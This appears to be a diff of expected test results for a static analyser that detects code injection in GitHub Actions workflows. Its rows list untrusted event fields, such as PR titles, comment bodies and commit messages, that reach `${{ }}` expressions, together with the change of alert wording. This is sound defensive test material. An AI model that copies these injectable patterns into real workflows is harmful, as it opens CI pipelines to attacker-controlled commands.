.github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | ${{ toJSON(github) }} | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | 